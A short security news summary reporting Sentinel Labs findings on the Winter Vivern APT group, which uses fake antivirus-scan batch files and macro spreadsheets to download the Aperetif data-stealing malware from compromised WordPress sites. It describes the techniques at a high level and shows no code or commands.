Security News > 2023 > March > Winter Vivern APT hackers use fake antivirus scans to install malware

Sentinel Labs has previously seen spreadsheet files with malicious macros that launch PowerShell being dropped on cloned sites used by the APT. Deploying fake virus scanners.

One example of Winter Vivern's resourcefulness in the Sentinel Labs report is the use of Windows batch files to impersonate antivirus scanners while, in reality, downloading malicious payloads.

As you can see from the batch files below, the malicious files will pretend to perform an antivirus scan, showing a running percentage of time left, while quietly downloading a malicious payload using PowerShell.

The malware is hosted on compromised WordPress websites, which are commonly used for malware distribution campaigns.

The Aperetif malware is capable of automatic file scanning and exfiltration, taking screenshots and sending all data in a base64-encoded form to a hardcoded command and control server URL. Sentinel Labs has recently spotted a new payload used by Winter Vivern, which appears to be similar in functionality to Aperefit, but it features an incomplete design, indicating that it's a work in progress.

In conclusion, Winter Vivern is a group that uses a relatively simplistic yet effective approach to lure its targets into downloading malicious files.

News URL

https://www.bleepingcomputer.com/news/security/winter-vivern-apt-hackers-use-fake-antivirus-scans-to-install-malware/